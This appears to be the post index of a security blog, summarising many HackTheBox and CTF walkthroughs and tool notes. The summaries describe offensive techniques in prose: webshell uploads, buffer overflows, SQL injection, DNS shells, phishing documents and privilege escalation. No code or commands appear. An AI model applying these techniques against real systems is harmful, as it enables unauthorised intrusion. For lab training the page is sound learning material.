HTB: Concealctf hackthebox htb-conceal nmap snmp snmpwalk ike ipsec ike-scan strongswan iis gobuster webshell upload nishang juicypotato potato watson windows windows10 oscp-like htb-mischief htb-bounty
Conceal brought something to HTB that I hadn’t seen before - connecting via an IPSEC VPN to get access to the host. I’ll use clues from SNMP and a lot of guessing and trial and error to get connected, and then it’s a realtively basic Windows host, uploading a webshell over FTP, and then using JuicyPotato to get SYSTEM priv. The box is very much unpatched, so I’ll show Watson as well, and leave exploiting those vulnerabilities as an exercise for the reader. It actually blows my mind that it only took 7 hours for user first blood, but then an additional 16.5 hours to root.
HTB: Lightweightctf hackthebox htb-lightweight nmap php linux centos ssh fail2ban ldap tcpdump wireshark credentials bruteforce hashcat capabilities openssl htb-ethereal sudoers arbitrary-write oscp-plus
Lightweight was relatively easy for a medium box. The biggest trick was figuring out that you needed to capture ldap traffic on localhost to get credentials, and getting that traffic to generate. The box actually starts off with creating an ssh account for me when I visit the webpage. From there I can capture plaintext creds from ldap to escalate to the first user. I’ll crack a backup archive to get creds to the second user, and finally use a copy of
opensslwith full Linux capabilities assigned to it to escalate to root. In Beyond root, I’ll look at the backup site and the real one, and how they don’t match, as well as look at the script for creating users based on http visits.
HTB: BigHeadctf hackthebox htb-bighead nmap windows 2k8sp2 gobuster wfuzz phpinfo dirsearch nginx github john hashcat zip 7z bof exploit python bitvise reg plink chisel tunnel ssh bvshell webshell keepass bash kpcli alternative-data-streams
BigHead required you to earn your 50 points. The enumeration was a ton. There was an really fun but challenging buffer overflow to get initial access. Then some pivoting across the same host using SSH and the a php vulnerability. And then finding a hidden KeePass database with a keyfile in an ADS stream which gave me the root flag.
BigHead Exploit Devctf hackthebox htb-bighead bof exploit python pwntools immunity mona ida reverse-engineering mingw nginx pattern-create egg-hunter
As my buffer overflow experience on Windows targets is relatively limited (only the basic vulnserver jmp esp type exploit previously), BigHeadWebSrv was probably the most complicate exploit chain I’ve written for a Windows target. The primary factor that takes this above something like a basic jmp esp is the space I have to write to is small. I got to learn a new technique, Egg Hunter, which is a small amount of code that will look for a marker I drop into memory earlier and run the shellcode after it.
HTB: Irkedctf hackthebox htb-irked nmap searchsploit exploit-db hexchat irc python steganography steghide ssh su password-reuse metasploit exim oscp-like
Irked was another beginner level box from HackTheBox that provided an opportunity to do some simple exploitation without too much enumeration. First blood for user fell in minutes, and root in 19. I’ll start by exploring an IRC server, and not finding any conversation, I’ll exploit it with some command injection. That leads me to a hint to look for steg with a password, which I’ll find on the image on the web server. That password gets me access as the user. I’ll find an setuid binary that’s trying to run a script out of /tmp that doesn’t exist. I’ll add code to that to get a shell. In Beyond Root, I’ll look at the Metasploit Payload for the IRC exploit, as well as some failed privesc exploits.
HTB: Teacherhtb-teacher ctf hackthebox debian stretch nmap gobuster skipfish hydra python cve-2018-1133 crackstation mysql pspy su cron chmod passwd arbitrary-write moodle
Teacher was 20-point box (despite the yellow avatar). At the start, it required enumerating a website and finding a png file that was actually a text file that revealed most of a password. I’ll use hydra to brute force the last character of the password, and gain access to a Moodle instance, software designed for online learning. I’ll abuse a PHP injection in the quiz feature to get code execution and a shell on the box. Then, I’ll find an md5 in the database that is the password for the main user on the box. From there, I’ll take advantage of a root cron that’s running a backup script, and give myself write access to whatever I want, which I’ll use to get root.
Commando VM: Lessons Learnedhome-lab commando fireeye smb net-view net-use firewall python winrm responder htb-ethereal
I worked a HackTheBox target over the last week using CommandoVM as my attack station. I was pleasantly surprised with how much I liked it. In fact, only once on this box did I need to fire up my Kali workstation. Because the target was Windows, there we parts that were made easier (and in one case made possible!). There were a couple additional struggles that arose, and I’m still in search of a good tmux equivalent. I’ll walk through some of the lessons learned from working in this distro.
HTB: RedCrossctf htb-redcross hackthebox ssh nmap wfuzz linux debian php cookies gobuster xss sqli sqlmap command-injection injection postgresql haraka exploit-db searchsploit suid sudo sudoers nss jail bof exploit python pwntools socat rop aslr htb-frolic htb-october
RedCross was a maze, with a lot to look at and multiple paths at each stage. I’ll start by enumerating a website, and showing two different ways to get a cookie to use to gain access to the admin panel. Then, I’ll get a shell on the box as penelope, either via an exploit in the Haraka SMPT server or via injection in the webpage and the manipulation of the database that controls the users in the ssh jail. Finally, I’ll show escalation to root three different ways, using the database again in two different ways, and via a buffer overflow in a setuid binary. In Beyond Root, I’ll dig into the SQL injection and check out how the ssh jail is configured.
Commando VM: Looking Aroundhome-lab commando fireeye openvpn burp 7zip winrar cmder greenshot windump payloadsallthethings seclists fuzzdb foxyproxy x64dbg dnspy ida ghidra gobuster wfuzz
Having built my CommandoVM in a previous post, now I am going to look at what’s installed, and what else I might want to add to the distribution. I’ll start with some tweaks I made to get the box into shape, check out what tools are present, and add some that I notice missing. After this, in I’ll use the VM to work a HTB target, and report back on in a future post.
Commando VM: Installationhome-lab commando fireeye youtube
Ever since Fireeye announced their new CommandoVM, the “Complete Mandiant Offensive VM”, I’d figured next time I had an occasion to target a Windows host, I would try to build a VM and give it a spin. This post is focused on getting up and running. I suspect additional posts on how it works out will follow.
HTB: Vaultctf htb-vault hackthebox nmap gobuster php upload webshell ssh credentials pivot qemu spice openvpn tunnel rbash gpg remmina ubuntu linux iptables sudo filter oswe-like
Vault was a a really neat box in that it required pivoting from a host into various VMs to get to the vault, at least the intended way. There’s an initial php upload filter bypass that gives me execution. Then a pivot with an OpenVPN config RCE. From there I’ll find SSH creds, and need to figure out how to pass through a firewall to get to the vault. Once in the vault, I find the flag encrypted with GPG, and I’ll need to move it back to the host to get the decryption keys to get the flag. In Beyond Root, I’ll look at a couple of unintended paths, including a firewall bypass by adding an IP address, and a way to bypass the entire thing by connecting to the Spice ports, rebooting the VMs into recovery, resetting the root password, and then logging in.
Wizard Labs: DevLifectf wizard-labs wl-devlife linux debian nmap gobuster python credentials
Another Wizard Lab’s host retired, DevLife. This was another really easy box, that required some simple web enumeration to find a python panel that would run python commands, and display the output. From there, I could get a shell and the first flag. Then, more enumeration to find a python script in a hidden directory that contained the root password. With that, I can escalate to root. There was also a swp file in the hidden directory that I’ll attempt to recover (and then figure out is actually nano), and I’ll look at how the php page runs python commands, and show an injection in that.
HTB: Curlingctf hackthebox htb-curling nmap joomla searchsploit webshell cron pspy curl suid cve-2019-7304 dirty-sock ubuntu exploit htb-sunday arbitrary-write
Curling was a solid box easy box that provides a chance to practice some basic enumeration to find a password, using that password to get access to a Joomla instance, and using the access to get a shell. With a shell, I’ll find a compressed and encoded backup file, that after a bit of unpacking, gives a password to privesc to the next user. As that user, I’ll find a root cron running curl with the option to use a configuration file. It happens that I can control that file, and use it to get the root flag and a root shell. In Beyond root, I’ll look at how setuid applies to scripts on most Linux flavors (and how it’s different from Solaris as I showed with Sunday), and how the Dirty Sock snapd vulnerability from a couple months ago will work here to go to root.
Analyzing Document Macros with Yaraphishing vbscript yara documents metasploit powershell
This post is actually inspired by a box I’m building for HTB, so if it ever gets released, some of you may see this post again. But Yara is also something I’ve used a ton professionally, and it is super useful. I’ll introduce Yara, a pattern matching tool which is super useful for malware analysis, and just a general use tool that’s useful to know. I’ll also look at the file format for both Microsoft Office and Libre Office documents, and how to decompress them to identify their contents. I’ll show how for Libre Office files, Yara can be applied to the unzipped document to identify macro contents.
HTB: Octoberhackthebox ctf htb-october webshell ubuntu linux bof exploit upload nmap oscp-plus aslr aslr-brute-force htb-frolic
October was interesting because it paired a very straight-forward initial access with a simple buffer overflow for privesc. To gain access, I’ll learn about a extension blacklist by pass against the October CMS, allowing me to upload a webshell and get execution. Then I’ll find a SetUID binary that I can overflow to get root. While the buffer overflow exploit was on the more straight-forward side, it still requires a level of skill beyond many of the other easy early boxes I’ve done so far.
HTB: Frolichtb-frolic hackthebox ctf nmap smbmap smbclient nodered gobuster php playsms javascript ook! python brainfuck fcrackzip xxd cve-2017-9101 webshell bof ret2libc peda metasploit oscp-like htb-reddish
Frolic was more a string of challenges and puzzles than the more typical HTB experiences. Enumeration takes me through a series of puzzles that eventually unlock the credentials to a PlaySMS web interface. With that access, I can exploit the service to get execution and a shell. To gain root, I’ll find a setuid binary owned by root, and overflow it with a simple ret2libc attack. In Beyond Root, I’ll at the Metasploit version of the PlaySMS exploit and reverse it’s payload. I’ll also glance through the Bash history files of the two users on the box and see how the author built the box.
HTB: Carrierctf hackthebox htb-carrier injection command-injection bgp-hijack nmap gobuster snmp snmpwalk pivot container tcpdump lxc lxd ssh
Carrier was awesome, not because it super hard, but because it provided an opportunity to do something that I hear about all the time in the media, but have never been actually tasked with doing - BGP Hijacking. I’ll use SMNP to find a serial number which can be used to log into a management status interface for an ISP network. From there, I’ll find command injection which actually gives me execution on a router. The management interface also reveals tickets indicting some high value FTP traffic moving between two other ASNs, so I’ll use BGP hijacking to route the traffic through my current access, gaining access to the plaintext credentials. In Beyond Root, I’ll look at an unintended way to skip the BGP hijack, getting a root shell and how the various containers were set up, why I only had to hijack one side of the conversation to get both sides, the website and router interaction and how to log commands sent over ssh, and what “secretdata” really was.
Applocker Bypass: COR Profilerctf hackthebox htb-ethereal windows applocker meterpreter metasploit beryllium visualstudio dotnet cor-profiler
On of the challenges in Ethereal was having to use a shell comprised of two OpenSSL connections over different ports. And each time I wanted to exploit some user action, I had to set my trap in place, kill my shell, start two listeners, and wait. Things would have been a lot better if I could have just gotten a shell to connect back to me over one of the two open ports, but AppLocker made that nearly impossible. IppSec demoed a method to bypass those filters using COR Profiling. I wanted to play with it myself, and get some notes down (in the form of this post).
HTB: Bastardhackthebox htb-bastard ctf web drupal drupalgeddon2 drupalgeddon3 droopescan dirsearch nmap windows searchsploit nishang ms15-051 smbserver htb-devel htb-granny php webshell oscp-like
Bastard was the 7th box on HTB, and it presented a Drupal instance with a known vulnerability at the time it was released. I’ll play with that one, as well as two more, Drupalgeddon2 and Drupalgeddon3, and use each to get a shell on the box. The privesc was very similar to other early Windows challenges, as the box is unpatched, and vulnerable to kernel exploits.
HTB: Etherealctf hackthebox htb-ethereal nmap pbox credentials injection hydra python shell dns-c2 firewall nslookup openssl lnk pylnker lnkup wfuzz ca msi windows
Ethereal was quite difficult, and up until a few weeks ago, potentially the hardest on HTB. Still, it was hard in a fun way. The path through the box was relatively clear, and yet, each step presented a technical challenge to figure out what was going on and how I could use it to get what I wanted. I’ll start by breaking into an old password vault that I find on FTP, and using that to authenticate to a website. That site has code injection, and I’ll use that to get exfil and eventually a weak shell over DNS. I’ll discover OpenSSL, and use that to get a more stable shell. From there, I’ll replace a shortcut to escalate to the next user. Then I’ll user CA certs that I find on target to sign an MSI file to give me shell as the administrator. I’ll also attach two additional posts, one going into how I attacked pbox, and another on how I developed a shell over blind command injection and dns.
HTB: Ethereal Attacking Password Boxctf hackthebox htb-ethereal windows pbox freebasic bruteforce credentials basic
For Ethereal, I found a DOS application,
pbox.exe, and a
pbox.datfile. These were associated with a program called PasswordBox, which was an early password manager program. To solve this box, most people likely just guessed the password, “password”. But what if I had needed to brute force it? The program was not friendly to taking input from stdin, or from running inside python. So I downloaded the source code, installed the FreeBasic compiler, and started hacking at the source until it ran in a way that I could brute force test 1000 passwords in 5 seconds. I’ll walk through my steps and thought process in this post.
HTB: Ethereal Shell Developmentctf hackthebox htb-ethereal windows dns-c2 python pdb python-cmd python-scapy injection python-requests
It would have been possible to get through the initial enumeration of Ethereal with just Burp Repeater and tcpdump, or using responder to read the DNS requests. But writing a shell is much more fun and good coding practice. I’ll develop around primary two modules from Python, scapy to listen for and process DNS packets, and cmd to create a shell user interface, with requests to make the http injections. In this post I’ll show how I built the shell step by step.
HTB: Grannyhtb-granny ctf hackthebox webdav aspx webshell htb-devel meterpreter windows ms14-058 local_exploit_suggester pwk cadaver oscp-like
As I’m continuing to work through older boxes, I came to Granny, another easy Windows host involving webshells. In this case, I’ll use WebDAV to get a webshell on target, which is something I haven’t written about before, but that I definitely ran into while doing PWK. In this case, WebDav blocks aspx uploads, but it doesn’t prevent me from uploading as a txt file, and then using the HTTP Move to move the file to an aspx. I’ll show how to get a simple webshell, and how to get meterpreter. For privesc, I’ll use a Windows local exploit to get SYSTEM access.
HTB: Develctf htb-devel hackthebox webshell aspx meterpreter metasploit msfvenom ms11-046 ftp nishang nmap watson smbserver upload windows oscp-like
Another one of the first boxes on HTB, and another simple beginner Windows target. In this case, I’ll use anonymous access to FTP that has it’s root in the webroot of the machine. I can upload a webshell, and use it to get execution and then a shell on the machine. Then I’ll use one of many available Windows kernel exploits to gain system. I’ll do it all without Metasploit, and then with Metasploit.
HTB: Accesshtb-access hackthebox ctf mdbtools readpst mutt telnet runas cached-creds dpapi mimikatz pylnker
Access was an easy Windows box, which is really nice to have around, since it’s hard to find places for beginners on Windows. And, unlike most Windows boxes, it didn’t involve SMB. I’ll start using anonymous FTP access to get a zip file and an Access database. I’ll use command line tools to find a password in the database that works for the zip file, and find an Outlook mail file inside. I’ll read the email to find the password for an account on the box, and connect with telnet. From there, I’ll take advantage of cached administrator credentials two different ways to get root.txt. In Beyond Root, I’ll look at ways to get more details out of lnk files, both with PowerShell and pylnker.
Playing with Jenkins RCE Vulnerabilityexploit cve-2019-1003000 jenkins jeeves powershell nishang windows.
HTB: Zipperctf htb-zipper hackthebox nmap zabbix api credentials path-hijack docker ltrace service-hijack exploit-db jq openssl php pivot ssh linux ubuntu oswe-like
Zipper was a pretty straight-forward box, especially compared to some of the more recent 40 point boxes. The main challenge involved using the API for a product called Zabbix, used to manage and inventory computers in an environment. I’ll show way too many ways to abuse Zabbix to get a shell. Then for privesc, I’ll show two methods, using a suid binary that makes a call to system without providing a full path, allowing me to change the path and get a root shell, and identifying a writable service file that I can hijack to gain root privlege. In Beyond Root, I’ll dig into the shell from Exploit-DB, figure out how it works, and make a few improvements.
Wizard Labs: Dummyctf wizard-labs wl-dummy windows ms17-010 smb msfvenom htb-legacy
I had an opportunity to check out Wizard Labs recently. It’s a recently launched service much like HackTheBox. Their user interface isn’t as polished or feature rich as HTB, but they have 16 vulnerable machines online right now to attack. The box called Dummy recently retired from their system, so I can safely give it a walk-through. It’s a bit of bad luck that I looked at this just after doing Legacy, as they were very similar boxes. Seems popular to start a service with a Windows SMB vulnerability. This was a Windows 7 box, vulnerable to MS17-010. I’ll use a different python script, and give the Metasploit exploit a spin and fail.
HTB: Legacyctf hackthebox htb-legacy windows ms08-067 ms17-010 smb msfvenom xp oscp-like
Since I’m caught up on all the live boxes, challenges, and labs, I’ve started looking back at retired boxes from before I joined HTB. The top of the list was legacy, a box that seems like it was one of the first released on HTB. It’s a very easy Windows box, vulnerable to two SMB bugs that are easily exploited with Metasploit. I’ll show how to exploit both of them without Metasploit, generating shellcode and payloads with msfvenom, and modifying public scripts to get shells. In beyond root, I’ll take a quick look at the lack of whoami on XP systems.
HTB: Giddyhackthebox ctf htb-giddy sqli sqlmap winrm net-ntlmv2 responder hashcat unifivideo defender ebowla smbserver applocker powershell-web-access
I thought Giddy was a ton of fun. It was a relateively straight forward box, but I learned two really neat things working it (each of which inspired other posts). The box starts with some enumeration that leads to a site that gives inventory. I’ll abuse an SQL-Injection vulnerability to get the host to make an SMB connect back to me, where I can collect Net-NTLMv2 challenge response, and crack it to get a password. I can then use either the web PowerShell console or WinRM to get a shell. To get system, I’ll take advantage of a vulnerability in Ubiquiti UniFi Video.
Playing with Dirty Socksnapd cve-2019-7304 hackthebox ubuntu exploit dirty-sock htb-canape
A local privilege escalation exploit against a vulnerability in the snapd server on Ubuntu was released today by Shenanigans Labs under the name Dirty Sock. Snap is an attempt by Ubuntu to simplify packaging and software distribution, and there’s a vulnerability in the REST API which is attached to a local UNIX socket that allowed multiple methods to get root access. I decided to give it a run, both on a VM locally and on some of the HackTheBox.eu machines.
HTB: Ypuffyhtb-ypuffy hackthebox ctf ldap ssh ssh-keygen doas sudo certificate certificate-authority wireshark cve-2018-14665 python flask wsgi authorizedkeyscommand htb-dab
Ypuffy was an OpenBSD box, but the author said it could have really been any OS, and I get that. The entire thing was about protocols that operate on any environment. I’ll use ldap to get a hash, which I can use to authenticate an SMB share. There I find an SSH key that gets me a user shell. From there, I’ll abuse my doas privilege with ssh-keygen to create a signed certificate that I can use to authenticate to the box as root for ssh. In Beyond root, I’ll look at the Xorg privesc vulnerability that became public a month or so after Ypuffy was released, and also explore the web server configuration used in the ssh auth.
HTB: Dabctf htb-dab hackthebox flask python nginx wsgi memcached bruteforce hydra wfuzz hashcat ssh ldd ldconfig reverse-engineering ida
Dab had some really neat elements, with a few trolls thrown in. I’ll start by ignoring a steg troll in an open FTP and looking at two web apps. As I’m able to brute force my way into one, it populates a memcached instance, that I’m then able to query using the other as a proxy. From that instance, I’m able to dump users with md5 password hashes. After cracking twelve of them, one gives me ssh access to the box. From there, I’ll take advantage of my having root level access to the tool that configures how dynamic run-time linking occurs, and use that to pivot to a root shell. In Beyond Root, I’ll look at the web apps and how they are configured, one of the troll binaries, and a cleanup cron job I found but managed to avoid by accident.
PWK Notes: Tunneling and Pivoting [Updated]pwk oscp pivot ssh tunnel sshuttle meterpreter htb-reddish.
HTB: Reddishhtb-reddish hackthebox ctf node-red nodejs tunnel php redis rsync wildcard docker
Reddish is one of my favorite boxes on HTB. The exploitation wasn’t that difficult, but it required tunneling communications through multiple networks, and operate in bare-bones environments without the tools I’ve come to expect. Reddish was initially released as a medium difficulty (30 point) box, and after the initial user blood took 9.5 hours, and root blood took 16.5 hours, it was raised to hard (40). Later, it was upped again to insane (50). To get root on this box, I’ll start with an instance of node-red, a javscript browser-based editor to set up flows for IoT. I’ll use that to get a remote shell into a container. From there I’ll pivot using three other containers, escalating privilege in one, before eventually ending up in the host system. Throughout this process, I’ll only have connectivity to the initial container, so I’ll have to maintain tunnels for communication.
HTB: SecNoteshackthebox ctf htb-secnotes csrf second-order-sqli second-order smb wsl bash.exe winexe smbclient webshell oscp-like htb-nightmare
SecNotes is a bit different to write about, since I built it. The goal was to make an easy Windows box that, though the HTB team decided to release it as a medium Windows box. It was the first box I ever submitted to HackTheBox, and overall, it was a great experience. I’ll talk about what I wanted to box to look like from the HTB user’s point of view in Beyond Root. SecNotes had a neat XSRF in the site that was completely bypassed by most people using an unintentional second order SQL injection. Either way, after gaining SMB credentials, it allowed the attacker to upload a webshell, and get a shell on the host. Privesc involved diving into the Linux Subsystem for Windows, finding the history file, and getting the admin creds from there.
Holiday Hack 2018: KringleConctf sans-holiday-hack
The Sans Holiday Hack is one of the events I most look forward to each year. This year’s event is based around KringleCon, an infosec conference organized by Santa as a response to the fact that there have been so many attempts to hack Christmas over the last few years. This conference even has a bunch of talks, some quite useful for completing the challenge, but others that as just interesting as on their own. To complete the Holiday Hack Challenge, I’m asked to enter this virtual conference, walk around, and solve a series of technical challenges. As usual, the challenges were interesting and set up in such a way that it was very beginner friendly, with lots of hints and talks to ensure that you learned something while solving. The designers also implemented several more defensive / forensic challenges this year, which was neat to see.
Getting Creds via NTLMv2responder mitm net-ntlmv2 hashcat llmnr wpad xp-dirtree.
HTB: Ozhtb-oz hackthebox ctf api sqli hashcat ssti jinja2 payloadsallthethings docker container pivot ssh port-knocking portainer tplmap jwt htb-olympus
Oz was long. There was a bunch of enumeration at the front, but once you get going, it presented a relatively straight forward yet technically interesting path through two websites, a Server-Side Template Injection, using a database to access an SSH key, and then using the key to get access to the main host. To privesc, I’ll go back into a different container and take advatnage of a vulnarbility in the docker management software to get root access.
HTB: Mischief Additional Rootshtb-mischief hackthebox ctf cve-2018-18955 policykit polkit pkexec pkttyagent
Since publishing my write-up on Mischief from HackTheBox, I’ve learned of two additional ways to privesc to root once I have access as loki. The first is another method to get around the fact the
suwas blocked on the host using PolicyKit with the root password. The second was to take advantage of a kernel bug that was publicly released in November, well after Mischief went live. I’ll quickly show both those methods.
HTB: Mischiefhackthebox ctf htb-mischief ipv6 snmp snmpwalk enyx command-injection hydra filter facl getfacl systemd-run lxc lxd wfuzz xxd iptables color-print htb-olympus
Mishcief was one of the easier 50 point boxes, but it still provided a lot of opportunity to enumerate things, and forced the attacker to think about and work with IPv6, which is something that likely don’t come naturally to most of us. I’ll use snmp to get both the IPv6 address of the host and credentials from the webserver. From there, I can use those creds to log in and get more creds. The other creds work on a website hosted only on IPv6. That site has command injection, which gives me code execution, a shell as www-data, and creds for loki. loki’s bash history gives me the root password, which I can use to get root, once I get around the fact that file access control lists are used to prevent loki from running su. In beyond root, I’ll look at how I could get RCE without the creds to the website, how I might have exfiled data via ping if there wasn’t a way to see output, the filtering that site did, and the iptables rules.
Hackvent 2018: Days 1-12ctf hackvent jab qrcode 14-segment-display javascript dial-a-pirate certificate-transparency piet perl deobfuscation steganography stegsolve nodejs sandbox-escape crypto telegram sqli
Hackvent is a great CTF, where a different challenge is presented each day, and the techniques necessary to solve each challenge vary widely. Like Advent of Code, I only made it through the first half before a combination of increased difficulty, travel for the holidays, and Holiday Hack (and, of course, winning NetWars TOC) all led to my stopping Hackvent mid-way. Still, even the first 12 challenges has some neat stuff, and were interesting enough to write up.
You Need To Know jqctf sans-holiday-hack hackthebox jq htb-waldo ja3 malware
jq is such a nifty tool that not nealry enough people know about. If you’re working with json data, even just small bits here and there, it’s worth knowing the basics to make some simple data manipulations possible. And if you want to become a full on jq wizard, all the better. In this post, I’ll walk through three examples of varying levels of complexity to show off jq. I’ll detail what I did in Waldo, show an example from the 2017 Sans Holiday Hack Challenge, and conclude with a real-world example where I’m looking at SSL/TLS fingerprints.
HTB: Waldoctf hackthebox htb-waldo docker php ssh rbash capabilities
Waldo was a pretty straight forward box, with a few twists that weren’t too difficult to circumvent. First, I’ll take advantage of a php website, that allows me to leak its source. I’ll use that to bypass filters to read files outside the webroot. In doing so, I’ll find an ssh key that gets me into a container. I’ll notice that I can actually ssh back into localhost again to get out of the container, but with a restricted rbash shell. After escaping, I’ll find the tac program will the linux capability set to allow for full system read, giving me full read access over the entire system, including the flag.
Advent of Code 2018: Days 1-12ctf advent-of-code python
Advent of Code is a fun CTF because it forces you to program, and to think about data structures and efficiency. It starts off easy enough, and gets really hard by the end. It’s also a neat learning opportunity, as it’s one of the least competitive CTFs I know of. After the first 20 people solve and the leaderboard is full, people start to post answers on reddit on other places, and you can see how others solved it, or help yourself when you get stuck. I’m going to create one post and just keep updating it with my answers as far as I get.
HTB: Activectf hackthebox htb-active active-directory gpp-password gpp-decrypt smb smbmap smbclient enum4linux getuserspns kerberoast hashcat psexec-py oscp-like
Active was an example of an easy box that still provided a lot of opportunity to learn. The box was centered around common vulnerabilities associated with Active Directory. There’s a good chance to practice SMB enumeration. It also gives the opportunity to use Kerberoasting against a Windows Domain, which, if you’re not a pentester, you may not have had the chance to do before.
PWK Notes: SMB Enumeration Checklist [Updated]oscp pwk enumeration smb nmblookup smbclient rpcclient nmap enum4linux smbmap
[Update 2018-12-02] I just learned about smbmap, which is just great. Adding it to the original post. Beyond the enumeration I show here, it will also help enumerate shares that are readable, and can ever execute commands on writable shares. [Original] As I’ve been working through PWK/OSCP for the last month, one thing I’ve noticed is that enumeration of SMB is tricky, and different tools fail / succeed on different hosts. With some input from the NetSecFocus group, I’m building out an SMB enumeration check list here. I’ll include examples, but where I use PWK labs, I’ll anonymize the data per their rules. If I’m missing something, leave a comment.
HTB: Hawkhackthebox ctf htb-hawk drupal ftp openssl openssl-bruteforce php credentials h2 oscp-plus
Hawk was a pretty easy box, that provided the challenge to decrypt a file with openssl, then use those credentials to get admin access to a Drupal website. I’ll use that access to gain execution on the host via php. Credential reuse by the daniel user allows me to escalate to that user. From there, I’ll take advantage of a H2 database to first get arbitrary file read as root, and then target a different vulnerability to get RCE and a root shell. In Beyond Root, I’ll explore the two other listening ports associated with H2, 5435 and 9092.
HTB: Smasherctf hackthebox htb-smasher bof pwntools timing-attack padding-oracle aes directory-traversal
Smasher is a really hard box with three challenges that require a detailed understanding of how the code you’re intereacting with works. It starts with an instance of shenfeng tiny-web-server running on port 1111. I’ll use a path traversal vulnerability to access to the root file system. I’ll use that to get a copy of the source and binary for the running web server. With that, I’ll write a buffer overflow exploit to get a reverse shell. Next, I’ll exploit a padding oracle vulnerability to get a copy of the smasher user’s password. From there, I’ll take advantage of a timing vulnerability in setuid binary to read the contents of root.txt. I think it’s possible to get a root shell exploiting a buffer overflow, but I wasn’t able to pull it off (yet). In Beyond Root, I’ll check out the AES script, and show how I patched the checker binary.
Buffer Overflow in HTB Smasherctf hackthebox htb-smasher gdb bof pwntools
There was so much to write about for Smasher, it seemed that the buffer overflow in tiny deserved its own post. I’ll walk through my process, code analysis and debugging, through development of a small ROP chain, and show how I trouble shot when things didn’t work. I’ll also show off pwntools along the way.
HTB: Jerryhackthebox htb-jerry ctf nmap tomcat war msfvenom jar jsp oscp-like
Jerry is quite possibly the easiest box I’ve done on HackTheBox (maybe rivaled only by Blue). In fact, it was rooted in just over 6 minutes! There’s a Tomcat install with a default password for the Web Application Manager. I’ll use that to upload a malicious war file, which returns a system shell, and access to both flags.
Malware Analysis: Phishing Docs from HTB Reelhackthebox ctf htb-reel malware rtf hta msfvenom rtfdump oledump scdbg powershell vbscript shellcode
I regularly use tools like msfvenom or scripts from GitHub to create attacks in HackTheBox or PWK. I wanted to take a minute and look under the hood of the phishing documents I generated to gain access to Reel in HTB, to understand what they are doing. By the end, we’ll understand how the RTF abuses a COM object to download and launch a remote HTA. In the HTA, we’ll see layers of script calling each other, until I find some shellcode loaded into memory by PowerShell and run. I’ll do some initial analysis of that shellcode to see the network connection attempts.
HTB: Reelhackthebox htb-reel ctf ftp cve-2017-0199 rtf hta phishing ssh bloodhound powerview active-directory metasploit htb-bart
Reel was an awesome box because it presents challenges rarely seen in CTF environments, phishing and Active Directory. Rather than initial access coming through a web exploit, to gain an initial foothold on Reel, I’ll use some documents collected from FTP to craft a malicious rtf file and phishing email that will exploit the host and avoid the protections put into place. Then I’ll pivot through different AD users and groups, taking advantage of their different rights to eventually escalate to administrator. In Beyond Root, I’ll explore remnants of a second path to root that didn’t make the final cut, look at the ACLs on root.txt, examine the script that opens attachments as nico.
PowerShell History Filepowershell psreadline history
I came across a situation where I discovered a user’s PSReadline ConsoleHost_history.txt file, and it ended up giving me the information I needed at the time. Most people are aware of the
.bash_historyfile. But did you know that the PowerShell equivalent is enabled by default starting in PowerShell v5 on Windows 10? This means this file will become more present over time as systems upgrade.
HTB: Dropzonehackthebox htb-dropzone ctf xp tftp mof wmi stuxnet alternative-data-streams sysinternals
Dropzone was unique in many ways. Right off the bat, an initial nmap scan shows no TCP ports open. I’ll find unauthenticated TFTP on UDP 69, and use that access identify the host OS as Windows XP. From there, I’ll use TFTP to drop a malicious mof file where it will automatically compiled, giving me code execution, in a technique made well know by Stuxnet (though not via TFTP, but rather a SMB 0-day). This technique provides a system shell, but there’s one more twist, as I’ll have to find the flags in alternative data streams of a text file on the desktop. I’ll also take this opportunity to dive in on WMI / MOF and how they were used in Stuxnet.
HTB: Bountyhackthebox htb-bounty ctf asp upload nishang lonelypotato potato meterpreter ms10-051 ms16-014 web-config sherlock watson oscp-like
Bounty was one of the easier boxes I’ve done on HTB, but it still showcased a neat trick for initial access that involved embedding ASP code in a web.config file that wasn’t subject to file extension filtering. Initial shell provides access as an unprivileged user on a relatively unpatched host, vulnerable to several kernel exploits, as well as a token privilege attack. I’ll show a handful of ways to enumerate and to escalate privilege, including a really neat new tool, Watson. When I first wrote this post, Watson wouldn’t run on Bounty, but thanks to some quick work from Rasta Mouse and Mark S, I was able to update the post to include it.
HTB TartarSauce: backuperer Follow-Upctf hackthebox htb-tartarsauce tar diff
I always watch IppSec’s videos on the retired box, because even if I completed the box, I typically learn something. Watching IppSec’s TartarSauce video yesterday left me with three things I wanted to play with a bit more in depth, each related to the
backupererscript. First, the issue of a bash if statement, and how it evaluates on exit status. Next, how Linux handles permissions and ownership between hosts and in and out of archives. Finally, I was wrong in thinking there wasn’t a way to get a root shell… so of course I have to do that.
HTB: TartarSaucectf htb-tartarsauce hackthebox wordpress wpscan php webshell rfi sudo tar pspy monstra cron oscp-like
TartarSauce was a box with lots of steps, and an interesting focus around two themes: trolling us, and the tar binary. For initial access, I’ll find a barely functional WordPress site with a plugin vulnerable to remote file include. After abusing that RFI to get a shell, I’ll privesc twice, both times centered around tar; once through sudo tar, and once needing to manipulate an archive before a sleep runs out. In beyond root, I’ll look at some of the rabbit holes I went down, and show a short script I created to quickly get initial access and do the first privesc in one step.
HTB: DevOopsctf hackthebox htb-devoops xxe ssh git pickle deserialization htb-canape rss oscp-plus
DevOops was a really fun box that did a great job of providing interesting challenges that weren’t too difficult to solve. I’ll show how to gain access using XXE to leak the users SSH key, and then how I get root by discovering the root SSH key in an old git commit. In Beyond Root, I’ll show an alternative path to user shell exploiting a python pickle deserialization bug.
PWK Notes: Post-Exploitation Windows File Transfers with SMBpwk oscp smb impacket exfil upload.
HTB: Sundayctf hackthebox htb-sunday finger hashcat sudo wget shadow sudoers gtfobins arbitrary-write oscp-like
Sunday is definitely one of the easier boxes on HackTheBox. It had a lot of fun concepts, but on a crowded server, they step on each other. We start by using finger to brute-force enumerate users, though once once person logs in, the answer is given to anyone working that host. I’m never a huge fan of asking people to just guess obvious passwords, but after that, there are a couple more challenges, including a troll that proves useful later, some password cracking, and a ton of neat opportunities to complete the final privesc using wget. I’ll show 6 ways to use wget to get root. Finally, in Beyond Root, I’ll explore the overwrite script being run by root, finger for file transfer, and execution without read.
HTB: Olympushackthebox htb-olympus ctf zone-transfer xdebug aircrack-ng 802-11 ssh port-knocking docker cve-2018-15473
Olympus was, for the most part, a really fun box, where we got to bounce around between different containers, and a clear path of challenges was presented to us. The creator did a great job of getting interesting challenges such as dns and wifi cracking into a HTB format. There was one jump I wasn’t too excited to have to make, but overall, this box was a lot of fun to attack.
HTB: Canapehackthebox python pickle deserialization couchdb ctf htb-canape flask pip sudo cve-2017-12635 cve-1017-12636 cve-2018-8007 erl erlang
